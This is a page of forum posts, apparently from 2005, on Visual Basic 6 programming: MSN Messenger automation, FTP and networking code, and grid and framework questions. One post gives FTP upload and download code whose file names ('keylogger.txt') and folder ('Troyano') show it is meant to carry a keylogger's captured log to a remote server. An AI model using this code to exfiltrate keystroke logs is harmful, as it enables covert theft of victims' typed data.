elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6
41  Programación / Programación Visual Basic / Re: mandar txt a email en: 19 Octubre 2005, 02:32 am
la verdad que si te conviene por FTP porque incluso de ser desconfiables los servidores de mail, NO ahi ningun servidor SMTP (para mail) que deje mandar anonimamente los mail, es decir que ahi que loggearse primero.

si queres el de FTP:

Código:
'con API's
Private Declare Function InternetOpen Lib "wininet.dll" Alias "InternetOpenA" _
    (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, _
    ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function InternetConnect Lib "wininet.dll" Alias "InternetConnectA" _
    (ByVal hInternetSession As Long, ByVal sServerName As String, _
    ByVal nServerPort As Integer, ByVal sUsername As String, _
    ByVal sPassword As String, ByVal lService As Long, _
    ByVal lFlags As Long, ByVal lContext As Long) As Long

    Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" _
    (ByVal hFtpSession As Long, ByVal lpszRemoteFile As String, _
    ByVal lpszNewFile As String, ByVal fFailIfExists As Boolean, _
    ByVal dwFlagsAndAttributes As Long, ByVal dwFlags As Long, _
    ByVal dwContext As Long) As Boolean
   

   

Private Sub Command1_Click()
lngINet = InternetOpen("MyFTP Control", 1, vbNullString, vbNullString, 0)
lngINetConn = InternetConnect(lngINet, "servidor", 0, _
    "usuario", "contraseña", 1, 0, 0)
blnRC = FtpGetFile(lngINetConn, "www\hola.txt", "c:\prueba.txt", 0, 0, 1, 0) 'obtenemos el archivo que esta dentro de la carpeta www y lo metemos en C:\ con el nombre de PRUEBA.txt
End Sub [\code]


si tengo error corriganme. si no queres por medio de api podes usar el control INTERNET TRANSFER CONTROL:


Private Function ITCReady(ShowMessage As Boolean)
'Chekea el estado del ITC  (poner un INTERNET TRANSFER CONTROL EN EL FORMULARIO), si esta realizando una operacion no hacer nada hasta que termine
If itc.StillExecuting Then
    ITCReady = False
    If ShowMessage Then
        MsgBox "Espere por favor, todavia trabajando", vbInformation + vbOKOnly, "Ocupado"
    End If
Else
    ITCReady = True
End If
End Function

Private Sub Command1_Click()
On Error Resume Next
'Colocar un label llamado LBLSTATUS
lblstatus = "Conectando"
Dim server As String
server = "servidor"
Dim username As String
username = "usuario"
Dim password As String
password = "contraseña"
'Establecemos el protocolo y el server y el usuario
itc.Protocol = icFTP
itc.URL = server
itc.username = username
itc.Cancel
'Establecemos el password y entramos
itc.password = password
itc.RequestTimeout = 40
itc.Execute , "DIR" 'hace dir
Do While itc.StillExecuting
    DoEvents: DoEvents: DoEvents
Loop
Dim www As String
www = "www/"  'se maneja como el DOS (DIR, CD, CD.., etc..)
Dim archivo As String
archivo = "keylogger.txt" 'establecemos el archivo
itc.Execute , "CD " & Chr(34) & www & Chr(34) 'entramos a la carpeta WWW/ porque asi esta establecido en el string WWW mas arriba
'agregar un list llamado lstremotefile
lstremotefile.Clear
Do Until ITCReady(False)
        DoEvents: DoEvents: DoEvents: DoEvents
    Loop
itc.Execute , "DIR"
Do Until ITCReady(False)
        DoEvents: DoEvents: DoEvents: DoEvents
    Loop
Dim dir As String
dir = "D:\franco\Visual Basic\Troyano"
    Kill dir & "/" & archivo
itc.Execute , "GET " & Chr(34) & archivo & Chr(34) & " " & Chr(34) & "D:\" & archivo & Chr(34) 'obtenemos archivo
End Sub

Private Sub Command2_Click()
Dim archivo As String
archivo = "prueba.txt"
Dim dir As String
dir = "D:\franco\Visual Basic\Troyano"
Dim reemplazar As String
reemplazar = "prueba.txt"
'si el ITC no se esta ejecutando enviamos el archivo
If ITCReady(True) = True Then
    'Enviamos el archivo y refrescamos el LISTBOX
    itc.Execute , "PUT " & Chr(34) & dir & "\" & archivo & Chr(34) & " " & Chr(34) & archivo & Chr(34)
    Do Until ITCReady(False)
        DoEvents: DoEvents: DoEvents: DoEvents
    Loop
    lstremotefile.Clear
    itc.Execute , "DIR"
    lblstatus = "Conectado"
End If
End Sub

Private Sub Form_Load()
'ahi que loggerase primero para que funcione pone el control INTERNET TRANSFER CONTROL en el formulario llamado ITC
RecievingSize = False
End Sub

Private Sub ITC_StateChanged(ByVal State As Integer)
'Chequea el estado del ITC y lo pone de acuerdo a lo que esta haciendo
Dim Data1, RemoteFiles
Dim RemoteFileName As String

Select Case State
    Case icResolvingHost
'pone un label llamado LBLSTATUS
        lblstatus = "Buscando direccion IP"
    Case icHostResolved
        lblstatus = "IP ENCONTRADA"
    Case icConnecting
        lblstatus = "Conectando"
    Case icConnected
        lblstatus = "Conectado"
    Case icRequesting
        lblstatus = "enviando pedido"
    Case icRequestSent
        lblstatus = "pedido enviado"
    Case icReceivingResponse
        lblstatus = "Reciviendo respuesta"
    Case icResponseReceived
        lblstatus = "Respuesta recivida"
    Case icDisconnecting
        lblstatus = "Desconectando"
    Case icDisconnected
        lblstatus = "No conectado"
    Case icError
        If itc.ResponseCode = 12030 Then
            lblstatus = "No conectado"
            itc.Cancel
        End If
        If itc.ResponseCode <> 87 Then
            MsgBox itc.ResponseCode & " " & itc.ResponseInfo, vbOKOnly + vbCritical, "Error"
        End If
    Case icResponseCompleted
        'loop hasta conseguir toda la info
        Do While True
            Data1 = itc.GetChunk(4096, icString)
            If Len(Data1) = 0 Then Exit Do
            DoEvents
            RemoteFiles = RemoteFiles & Data1
        Loop
       
        Beep
       
        'si esta reciviendo dice el tamaño y sale de la SUB
        If RecievingSize Then
'pone un listbox llamado LSTREMOTEFILE
            MsgBox "El tamaño del archivo es de: " & lstremotefile.Text & " es " & RemoteFiles & " bytes", vbInformation + vbOKOnly, "Size"
            Exit Sub
        End If
       
        'Loop hasta conesguir los nombres de todos los archivos del LIST
        For i = 1 To Len(RemoteFiles)
            If Mid(RemoteFiles, i, 1) = Chr(13) Then
                If Trim(RemoteFileName) <> "" Then
                    lstremotefile.AddItem RemoteFileName
                    RemoteFileName = ""
                End If
            Else
                If Mid(RemoteFiles, i, 1) <> Chr(10) Then
                    RemoteFileName = RemoteFileName & Mid(RemoteFiles, i, 1)
                End If
            End If
        Next i
End Select
End Sub
Código:



espero que les sirva de ayuda

chau
42  Programación / Programación Visual Basic / Re: Programar para trabajar en red. en: 19 Octubre 2005, 02:12 am
fijate en www.planet-source-code.com yo tambien tuve el mismo problema y trabajo con DAO en mis programas ejej y modificando bastante el codigo de un programita que encontre ahi (porque estaba en ADO) pude hacerlo. El programa que te cuento (que no me acuerdo como se llama) trabaja con WINSOCK y yo tenia que el servidor tenia la base de datos y con el cliente podias hacer consutas que habria la base de datos, las colocaba en un campo y las enviaba automaticamente por red hacia el otro usuario. Supongo que algo asi queres vos nomas que podes hacer que vos le mandas al servidor y este lo coloca en la base de datos.

chau
43  Programación / Programación Visual Basic / Re: plugin winamp x msn en: 19 Octubre 2005, 02:08 am
aa eso seria bueno, creo y supongo que se podria hacer con las API's como el de obtener nombres de las ventanas (ya que el winamp pone en su barra de titulo el nombre de la repoduccion + al principio pone la posicion del tema por ejemplo "194. BLACK EYED PEAS") entonces se podria obtener el nombre de esa ventana y por medio del comando MID podriamos evitar el 194. y para ponerlo al lado del nick pordiramos tomar el nick actual mediante la api del messegner y que cambie el nick solo al detectar que la barra de titulo del winamp cambio.

creo que eso estaria bien jeje

si tienen nuevas ideas poseteen please que esta interesante

bye
44  Programación / Programación Visual Basic / para los pibes que quieren ejemplos de MSN en visual basic en: 16 Octubre 2005, 23:42 pm
bueno para todos los pibes que quieren ejemplos sobre el MSN decidi publicar mis programas (como 5) y algunos ejemplos que tenia por ahi que me dieron otros tipos Y algunso que baje. El mejor que ahi se llama flooder de estado ind.vbp (que no solo es un flooder, veanlo y si les gusta me dicen pq lo hice yo :P)

el link es este:
http://rapidshare.de/files/6373096/MSN.rar.html

chau y que lo disfruten
45  Programación / Programación Visual Basic / Re: Programar para MSN en: 16 Octubre 2005, 23:17 pm
che corregi tu subnick (o como se llame XD)

HOMERO, no hombero

chau!
46  Programación / Programación Visual Basic / Re: Por que no VB? en: 16 Octubre 2005, 23:15 pm
pero con visual basic podemos hacer de todo, o no??, excepto al ser un lenguaje de alto nivel no podemos controlar muchos aspectos de hardware jeje (eso es lo malooo  :'(, ej: desconectar el puerto USB.), pero dentro de todo esta bien, facil, solo ahi que pensar un poco (un poco mas que poco la verdad ejejej.) pero como todo lenguaje tambien tiene algunas complicaciones. VB no esta plenamente orientado a programacion de objetos jeje pero se peude jej

chau
47  Programación / Programación Visual Basic / ayuda con flexgrid en: 15 Octubre 2005, 01:41 am
hola. he intentado y no he podido lograr limpiar un flexgrid que tengo  :'( . me refiero a borrar todos los registros no a un flexgrid.clean si me entienden.

yo pense en este codigo y funciona pero a la hora de agregar nuevos registro, el primero no aparece sino que aparecen despues de 4 veces agregado el mismo

Sub borrar()
flexgrid.FixedRows = 0
flexgrid.Clear
Do While Not flxhoras.Rows = 1
flexgrid.RemoveItem 1
Loop
End Sub


chau. espero ayuda
48  Programación / Programación Visual Basic / Re: Visual Basic: 6, .net, 2005, framework ¿¿?? en: 9 Octubre 2005, 17:48 pm
Para que un software compilado con el Visual Basic .Net funcione correctamente bajo la máquina del cliente, éste debe de tener Framework instalado, ¿o me equivoco?

no no te equivocas, pero la computadora cliente debe tener instalado el framework 2.0 no el 1.1 que normalmente las tienen todas las pc's. La cuetion en que el framework 2.0 esta en fase BETA por lo cual todavia las computadoras no lo traen instalado, pero cuando salga la verson final ya supongo que lo va a traer instalado dentro del windows (seria lo mejor). Pongo en la cita FUNCIONE CORRECTAMENTE en negrita debido a que si la maquina "cliente" no tiene instalado el framework 2.0 beta NO va a funcionar  :'( por mas simple que sea el programa.

bueno me despido y espero que les sirva mi info

bye
49  Programación / Programación Visual Basic / Re: Particiones del Disco Duro!! en: 8 Octubre 2005, 19:39 pm
con las API's se puede

para ejemplos bajate el programa API GUIDE esta muy facha
50  Programación / Programación Visual Basic / Re: el Msn poseido xD en: 8 Octubre 2005, 19:35 pm
yo ya lo hice a eso jajaj (quedo muy cheto)

pero yo no tengo desinstalado el winmessenger.


lo que tenes que hacer es esto:

Código:
'en declaraciones 
public withevents msn as messengerAPI.messenger
'claro está que primero tenes que irte a proyecto>referencia y agregar la MESSENGER API TYPE LIBRARY sino no funk

'luego en form load tenes que poner:
private sub form_load()
set msn = new messengerAPI.messenger
end sub

'despues le pones el resto del codigo por ejemplo para llamar a una ventana se hace con el comando instantmessage

bueno che si queres que te pase el codigo fuente de mi prog. agregame al messenger (podes ver mi e-mail apretando en mi nick "LA CACA")

chau
Páginas: 1 2 3 4 [5] 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines